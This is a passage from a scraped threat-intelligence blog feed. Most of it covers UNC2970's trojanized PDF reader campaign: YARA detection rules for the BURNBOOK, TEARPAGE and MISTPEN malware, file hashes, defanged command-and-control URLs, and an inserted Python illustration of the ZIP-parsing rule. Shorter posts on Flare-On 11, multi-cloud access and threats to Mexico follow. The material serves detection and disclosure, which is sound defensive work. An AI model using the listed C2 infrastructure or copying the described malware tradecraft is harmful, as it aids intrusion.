vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://dstvdtt.co[.]za/wp-content/plugins/social-pug/assets/lib.php</code><span style="vertical-align: baseline;"> — Television installation company in South Africa</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Furthermore, the </span><span style="vertical-align: baseline;">d</span><span style="vertical-align: baseline;"> function in the earlier MISTPEN sample has a different implementation that uses an additional HTTP request in order to receive and parse PE files from the C2 server.</span></p> <p><span style="vertical-align: baseline;">The usage of the AES encryption is also different in the two samples observed. The earlier sample uses AES to decrypt HTTPS URLs, while the later sample uses it to decrypt the token used to access the Microsoft Graph API.</span></p> <p><span style="vertical-align: baseline;">Based on the differences we have highlighted, the threat actor has improved their malware over time by implementing new features and adding a network connectivity check to hinder the analysis of the samples.</span></p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Threat Actor Spotlight: UNC2970</span></h2> <p><span style="vertical-align: baseline;">In June 2024, Mandiant Managed Defense responded to an intrusion leveraging a job-themed phishing email to social engineer a victim to download a malicious archive from WhatsApp. The archive contained both the job description specifics and the implant components targeting a multinational energy company. 
</span></p> <p><span style="vertical-align: baseline;">Mandiant Managed Defense reported </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/dprk-whatsapp-phishing/"><span style="text-decoration: underline; vertical-align: baseline;">similar activity</span></a><span style="vertical-align: baseline;"> in 2022 that was attributed to UNC4034, a group later merged into UNC2970.</span></p> <p><span style="vertical-align: baseline;">UNC2970 is a suspected North Korea-nexus cyber espionage group that Mandiant has tracked since 2021. Its activity overlaps with that of </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023"><span style="text-decoration: underline; vertical-align: baseline;">TEMP.Hermit</span></a><span style="vertical-align: baseline;">, a threat actor that has collected strategic intelligence aligned with North Korean interests since at least 2013.</span></p> <p><span style="vertical-align: baseline;">Mandiant has observed UNC2970 targeting victims located in the United States, United Kingdom, The Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia.</span></p> <h2><span style="vertical-align: baseline;">Acknowledgements</span></h2> <p><span style="vertical-align: baseline;">Martin Co, Muhammad Umer Khan, Mike Stokkel </span></p> <h2><span style="vertical-align: baseline;">Detection Opportunities</span></h2> <p><span style="vertical-align: baseline;">A </span><a href="https://www.virustotal.com/gui/collection/4bb3539c6f1336cb8154696428fb708bd558de300b18529a947fbe02a62e2907/summary" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence Collection</span></a><span style="vertical-align: baseline;"> featuring indicators of compromise (IOCs) related to the activity described in this post is available to registered users.</span></p> 
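The M_Launcher_BURNBOOK_1 rule below detects the trojanized SumatraPDF archive by walking the ZIP structure directly: for each local file header (50 4B 03 04) it reads the uint16 file-name length at +26 and checks the name field starting at +30, and for each central directory entry (50 4B 01 02) it reads the length at +28 and checks the name at +46. The following Python, added here as an illustration and not code from the original post or from Mandiant, performs that same walk on an in-memory archive so the offsets the rule hard-codes can be seen in action. The archives it scans are constructed samples whose member contents are placeholders; only the member names mirror the rule. The check is deliberately looser than the rule, which pairs local header i with central directory entry i and skips the first record.

```python
"""Walk a ZIP archive the way the M_Launcher_BURNBOOK_1 YARA rule does.

Every occurrence of the local-file-header or central-directory signature is
treated as a record, exactly as YARA's byte matching would, and the file-name
field is read from the hard-coded offsets the rule uses.
"""
import io
import struct
import zipfile

# Member names required by the rule; ".pdf" is matched as a substring.
BURNBOOK_MEMBER_NAMES = (
    "libmupdf.dll", ".pdf", "PdfFilter.dll", "PdfPreview.dll", "SumatraPDF.exe",
)

LOCAL_HDR_MAGIC = b"PK\x03\x04"  # 50 4B 03 04, little-endian uint32 0x04034b50
CD_HDR_MAGIC = b"PK\x01\x02"     # 50 4B 01 02


def _record_names(data: bytes, magic: bytes, len_off: int, name_off: int) -> list[str]:
    """Return the file-name field of every record introduced by `magic`.

    `len_off` is where the uint16 name length sits relative to the signature
    and `name_off` is where the name itself begins (26/30 for local headers,
    28/46 for central directory entries). No other header fields are validated,
    mirroring the rule's behaviour.
    """
    names = []
    pos = data.find(magic)
    while pos != -1:
        if pos + len_off + 2 <= len(data):
            (name_len,) = struct.unpack_from("<H", data, pos + len_off)
            raw = data[pos + name_off : pos + name_off + name_len]
            names.append(raw.decode("utf-8", errors="replace"))
        pos = data.find(magic, pos + len(magic))
    return names


def local_header_names(data: bytes) -> list[str]:
    """Names from local file headers: length at +26, name at +30."""
    return _record_names(data, LOCAL_HDR_MAGIC, 26, 30)


def central_directory_names(data: bytes) -> list[str]:
    """Names from central directory entries: length at +28, name at +46."""
    return _record_names(data, CD_HDR_MAGIC, 28, 46)


def matches_burnbook_layout(data: bytes) -> bool:
    """True when the file starts with a local header (the rule's uint32(0)
    check) and every indicator name appears in at least one local header
    and at least one central directory entry."""
    if data[:4] != LOCAL_HDR_MAGIC:
        return False
    local = local_header_names(data)
    central = central_directory_names(data)
    return all(
        any(ind in n for n in local) and any(ind in n for n in central)
        for ind in BURNBOOK_MEMBER_NAMES
    )


def build_archive(members: dict[str, bytes]) -> bytes:
    """Constructed sample input: an in-memory, stored (uncompressed) ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed archives; contents are placeholders, not the real samples.
SUSPECT_ARCHIVE = build_archive({
    "SumatraPDF/SumatraPDF.exe": b"MZ placeholder",
    "SumatraPDF/libmupdf.dll": b"MZ placeholder",
    "SumatraPDF/PdfFilter.dll": b"MZ placeholder",
    "SumatraPDF/PdfPreview.dll": b"MZ placeholder",
    "job description.pdf": b"%PDF-1.7 placeholder",
})
BENIGN_ARCHIVE = build_archive({"README.txt": b"nothing to see here"})

if __name__ == "__main__":
    print("suspect archive:", matches_burnbook_layout(SUSPECT_ARCHIVE))  # True
    print("benign archive:", matches_burnbook_layout(BENIGN_ARCHIVE))    # False
```

Because the walk keys off the signature bytes alone, a signature that happens to appear inside compressed member data is counted as a record, which is also how the YARA rule behaves; the rule's additional requirement that the same index i match in both header types narrows this further.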
<h2><span style="vertical-align: baseline;">YARA Rules</span></h2></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_BURNBOOK_1
{
    meta:
        author = "Mandiant"
        date_created = "2024-08-12"
        date_modified = "2024-08-12"
        md5 = "8c2302c2d43ebe5dda18b8d943436580"
        rev = 1
    strings:
        $pk_magic = { 50 4B 03 04 }
        $cd_magic = { 50 4B 01 02 }
        $n1 = "libmupdf.dll"
        $n2 = ".pdf"
        $n3 = "PdfFilter.dll"
        $n4 = "PdfPreview.dll"
        $n5 = "SumatraPDF.exe"
    condition:
        uint32(0) == 0x04034b50 and
        for any i in (2 .. #pk_magic) : (
            ($n1 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and
            ($n1 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28)))
        ) and
        for any i in (2 .. #pk_magic) : (
            ($n2 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and
            ($n2 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28)))
        ) and
        for any i in (2 .. #pk_magic) : (
            ($n3 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and
            ($n3 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28)))
        ) and
        for any i in (2 .. #pk_magic) : (
            ($n4 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and
            ($n4 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28)))
        ) and
        for any i in (2 .. #pk_magic) : (
            ($n5 in (@pk_magic[i] + 30 .. @pk_magic[i] + 30 + uint16(@pk_magic[i] + 26))) and
            ($n5 in (@cd_magic[i] + 46 .. @cd_magic[i] + 46 + uint16(@cd_magic[i] + 28)))
        )
}</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_BURNBOOK_2
{
    meta:
        author = "Mandiant"
        date_created = "2024-08-12"
        date_modified = "2024-08-12"
        md5 = "57e8a7ef21e7586d008d4116d70062a6"
        rev = 1
    strings:
        $parse_decoy_document = { FF 15 [4-32] 41 B8 08 00 00 00 [4-32] FF 15 [4] 85 C0 0F 8? [4-32] 48 83 ?? 08 48 3B ?? 0F 8? [4-32] 41 B8 20 00 00 00 [4-32] FF 15 [4] 85 C0 0F 8? [4-32] 41 B8 0C 00 00 00 [4-32] FF 15 [4] 85 C0 0F 8? }
        $chacha_marker = { 65 78 70 61 [0-12] 6E 64 20 33 [0-12] 32 2D 62 79 [0-12] 74 65 20 6B }
    condition:
        all of them
}</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_MISTPEN_2
{
    meta:
        author = "Mandiant"
        date_created = "2024-08-13"
        date_modified = "2024-08-13"
        md5 = "eca8eb8871c7d8f0c6b9c3ce581416ed"
        rev = 1
    strings:
        $s1 = "Cookie: _PHPSESSIONID="
        $s2 = "%d_%s_%d"
        $s3 = "DEAD" fullword
        $s4_sleep_succcess = { 53 6C 65 65 [1-16] 70 20 53 75 [1-16] 63 63 65 73 [1-16] 73 00 }
        $s5_hiber_success = { 48 69 62 65 [1-16] 72 20 53 75 [1-16] 63 63 65 73 [1-16] 73 00 }
        $s6 = "Loaded at %p"
        $s7 = "setup.bin" wide
        $send_DEAD_signal = { 8B 05 [4] 48 C7 ?? FF FF FF FF 89 45 ?? 0F B6 05 [4] 88 45 ?? 4? 8D [2-64] B9 40 00 00 00 FF 15 [4-8] 8? ?? 01 [1-32] 48 8D 48 08 E8 }
        $const_marker = { 83 E3 09 81 C3 11 27 00 00 }
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and
        (6 of them or ($s1 and $s2 and $s3 and $s6))
}</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Launcher_TEARPAGE_1
{
    meta:
        author = "Mandiant"
        date_created = "2024-08-13"
        date_modified = "2024-08-13"
        md5 = "006cbff5d248ab4a1d756bce989830b9"
        rev = 1
    strings:
        $load_encrypted_payload = { FF 15 [4-8] 83 F8 2C 0F 8? [4-32] 41 B8 20 00 00 00 [4-12] FF 15 [4] 85 C0 0F 8? [4-32] 41 B8 0C 00 00 00 [4-12] FF 15 [4] 85 C0 0F 8? [4-32] 83 C6 D4 B9 40 00 00 00 [2-16] FF 15 }
        $chacha_marker = { 65 78 70 61 [0-12] 6E 64 20 33 [0-12] 32 2D 62 79 [0-12] 74 65 20 6B }
        $load_pe = { 81 3C [1-3] 50 45 00 00 [1-8] 8B [1-3] 50 [4-32] B9 FF FF 1F 00 [2-16] FF 15 [4-64] C7 44 24 [1-8] 40 00 00 00 C7 44 24 [1-8] 00 30 00 00 41 FF D? 85 C0 0F 8? }
    condition:
        all of them
}</code></pre></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">YARA-L Rules</span></h2> <p><span style="vertical-align: baseline;">Mandiant has made the relevant rules available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set. The activity discussed in the blog post is detected under the rule names:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">BURNBOOK Related Files Dropping Activity</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">BURNBOOK C2 Callout Activity</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">BURNBOOK Payload Dropping Activity</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">Indicators of Compromise</span></h2> <h3><span style="vertical-align: baseline;">Host-Based IOCs</span></h3></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 
hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <thead> <tr> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">IOC</strong></p> </th> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">MD5</strong></p> </th> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Associated Malware Family</strong></p> </th> </tr> </thead> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">BAE_Vice President <br/>of Business Development.pdf</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">28a75771ebdb96d9b49c9369918ca581</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Encrypted PDF containing MISTPEN payload</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code 
style="vertical-align: baseline;">libmupdf.dll</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">57e8a7ef21e7586d008d4116d70062a6</code></p> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">f3baee9c48a2f744a16af30220de5066</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BURNBOOK</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">%APPDATA%\Roaming\Microsoft\BDE<br/> UI Launcher\wtsapi32.dll</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">006cbff5d248ab4a1d756bce989830b9</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TEARPAGE</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">%APPDATA%\Roaming\Thumbs.ini </code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">0b77dcee18660bdccaf67550d2e00b00</code></p> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">b707f8e3be12694b4470255e2ee58c81</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">MISTPEN</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">binhex.dll</code></p> </td> 
<td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">cd6dbf51da042c34c6e7ff7b1641837d</code></p> <p role="presentation" style="text-align: justify;"><code style="vertical-align: baseline;">eca8eb8871c7d8f0c6b9c3ce581416ed</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">MISTPEN</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Network-Based IOCs</span></h3></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: 
auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">URL</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://graph.microsoft[.]com/v1.0/me/drive/root:/path/upload/world/266A25710006EF92</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">heropersonas[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://dstvdtt.co[.]za/wp-content/plugins/social-pug/assets/lib.php</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://cmasedu[.]com/wp-content/plugins/kirki/inc/script.php</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://bmtpakistan[.]com/solution/wp-content/plugins/one-click-demo-import/assets/asset.php</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://verisoftsystems[.]com/wp-content/plugins/optinmonster/views/upgrade-link-style.php</code></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; 
padding: 16px;"> <p style="text-align: justify;"><code style="vertical-align: baseline;">hxxps://www.clinicabaru[.]co/wp-content/plugins/caldera-forms/ui/viewer-two/viewer-2.php</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div></description><pubDate>Tue, 17 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Announcing the 11th Annual Flare-On Challenge</title><link>https://cloud.google.com/blog/topics/threat-intelligence/announcing-eleventh-annual-flare-on-challenge/</link><description><div class="block-paragraph_advanced"><p>Written by: Nick Harbour</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When it's pumpkin spice season, that means it's also Flare-On Challenge season. The Flare-On Challenge is a reverse engineering contest held every year by the FLARE team, and this marks its eleventh year running. It draws thousands of players from around the world every year, and is the foremost single-player CTF-style challenge for current and aspiring reverse engineers. It provides individual players with a gauntlet of increasingly challenging puzzles to test their ability, and earn a position in our hall of fame. 
Veteran competitors who have been following the live countdown over at </span><a href="http://flare-on.com" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">flare-on.com</span></a><span style="vertical-align: baseline;"> may have already marked their calendar for the contest launch at 8:00pm ET on Sept. 27th, 2024. It will run for six weeks, ending at 8:00pm ET on Nov. 8th, 2024.</span></p> <p><span style="vertical-align: baseline;">The Flare-On contest always features a diverse array of architectures, but with a strong representation of Windows binaries. This year’s contest may be the most diverse ever, with 10 challenges covering architectures including Windows, Linux, JavaScript, .NET, YARA, UEFI, Verilog, and Web3. Yes, you read that correctly, there is a YARA challenge this year. The challenges are often designed to represent Reverse Engineering challenges the FLARE team has encountered on the frontlines of cybersecurity.</span></p> <p><span style="vertical-align: baseline;">If you successfully crush all 10 challenges you will be eligible to receive a prize, which will be revealed later. This crucial bit of gear will distinguish you from your colleagues who have not mastered the arcane art of Reverse Engineering, and will thus be an object of their envy. Your name or handle, should you choose to be included, will be permanently etched into the Hall of Fame on the </span><a href="http://flare-on.com" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Flare-On website</span></a><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">Please check the </span><a href="http://flare-on.com" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Flare-On website</span></a><span style="vertical-align: baseline;"> for the live countdown and, upon launch, the link to the game server. 
Early account registration will open approximately two days before launch. While you’re there, check out last year’s challenges and official solutions to prepare yourself. For official news and information, we will be using the Twitter/X hashtag #flareon11.</span></p></div></description><pubDate>Fri, 13 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/announcing-eleventh-annual-flare-on-challenge/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Announcing the 11th Annual Flare-On Challenge</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/announcing-eleventh-annual-flare-on-challenge/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Protecting Multi-Cloud Resources in the Era of Modern Cloud-Based Cyberattacks</title><link>https://cloud.google.com/blog/topics/threat-intelligence/protecting-multi-cloud-resources-modern-cyberattacks/</link><description><div class="block-paragraph_advanced"><p>Written by: Rupanjana<span style="vertical-align: baseline;"> Mukherjee, Jon Sabberton</span></p> <hr/></div> <div class="block-paragraph_with_image"><div class="article-module h-c-page"> <div class="h-c-grid uni-paragraph-wrap"> <div class="uni-paragraph h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6 h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"> <figure class="article-image--wrap-small " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/standardizing-privileged-access-architectu.max-1000x1000.jpg" alt="Standardizing Privileged Access Architecture for Multi-Cloud cover"> </figure> <p data-block-key="1mvlv">In the era of multi-cloud adoption, where organizations leverage diverse cloud platforms to 
optimize their operations, a new wave of security challenges has emerged. The expansion of attack surfaces beyond traditional on-premises environments, coupled with complex permission structures and the prevalence of overly permissive accounts, has created fertile ground for sophisticated cyberattacks.</p> </div> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Our white paper, </span><a href="https://services.google.com/fh/files/misc/standardizing-privileged-access-architecture-for-multi-cloud.pdf" rel="noopener" target="_blank"><span style="font-style: italic; vertical-align: baseline;">Standardizing Privileged Access Architecture for Multi-Cloud</span></a><span style="vertical-align: baseline;">, explores the critical risks associated with multi-cloud environments and provides a practical framework for establishing a robust security posture.</span></p> <p><span style="vertical-align: baseline;">This Mandiant paper examines the intricacies of managing disparate cloud identities, roles, and access control models, highlighting the vulnerabilities that arise from misconfigurations and fragmented security practices. 
It also examines real-world attack scenarios observed by Mandiant, demonstrating how threat actors exploit these weaknesses to compromise sensitive data, disrupt operations, and gain unauthorized control.</span></p> <p><span style="vertical-align: baseline;">To counter these evolving threats, Mandiant introduces a cloud-agnostic tiered security model built around the following controls to protect privileged access to critical assets in the cloud:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Resource tiering within cloud platforms</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Limiting lateral movement through credential tiering</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforcing strict access controls through a zero-trust approach</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Applying scalable security configurations and governance to all resources</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Consistent monitoring and analytics practices</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The paper describes an architecture for cloud-agnostic tiering and explains how it helps protect a hybrid multi-cloud environment from modern cyberattacks. 
By implementing the proactive measures outlined in the paper, organizations can mitigate the risks of a hybrid multi-cloud environment, limit paths of lateral movement, and protect their critical assets in the dynamic multi-cloud landscape.</span></p> <p><span style="vertical-align: baseline;">For organizations exploring multi-cloud deployments, and for those securing their existing cloud resources, this paper serves as vital guidance for hardening their environments against cloud-based attacks.</span></p> <p><span style="vertical-align: baseline;">Read the <a href="https://services.google.com/fh/files/misc/standardizing-privileged-access-architecture-for-multi-cloud.pdf" rel="noopener" target="_blank">paper</a> today. To hear more about the topics discussed in this paper, watch our “<a href="https://www.youtube.com/watch?v=tJIVznkfIJ0" rel="noopener" target="_blank">Standardizing a Privileged Access Model for a Multi-Cloud Environment</a>” session from </span><a href="https://mwise.mandiant.com/conf24/home" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">mWISE Conference 2024</span></a><span style="vertical-align: baseline;">.</span></p></div></description><pubDate>Thu, 12 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/protecting-multi-cloud-resources-modern-cyberattacks/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Protecting Multi-Cloud Resources in the Era of Modern Cloud-Based Cyberattacks</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/protecting-multi-cloud-resources-modern-cyberattacks/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Insights on Cyber Threats Targeting Users and 
Enterprises in Mexico</title><link>https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-mexico/</link><description><div class="block-paragraph_advanced"><p>Written by: Aurora Blum, Kelli Vanderlee</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Like many countries across the globe, Mexico faces a cyber threat landscape made up of a complex interplay of global and local threats, with threat actors carrying out attempted intrusions into critical sectors of Mexican society. Mexico also faces threats posed by the worldwide increase in multifaceted extortion, as ransomware and data theft continue to rise.</span></p> <p><span style="vertical-align: baseline;">Threat actors with an array of motivations continue to seek opportunities to exploit the digital infrastructure that Mexicans rely on across all aspects of society. This joint blog brings together our collective understanding of the cyber threat landscape impacting Mexico, combining insights from Google's Threat Analysis Group (TAG) and Mandiant's frontline intelligence. By sharing our global perspective, especially during today's</span><span style="vertical-align: baseline;"> </span><a href="https://blog.google/around-the-globe/google-latin-america/google-for-mexico-2024/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google for Mexico event</span></a><span style="vertical-align: baseline;">, we hope to enable greater resiliency in mitigating these threats.</span></p> <h2><span style="vertical-align: baseline;">Cyber Espionage Operations Targeting Mexico</span></h2> <p><span style="vertical-align: baseline;">As the 12th largest economy in the world, Mexico draws attention from cyber espionage actors from multiple nations, with targeting patterns mirroring broader priorities and focus areas that we see elsewhere. 
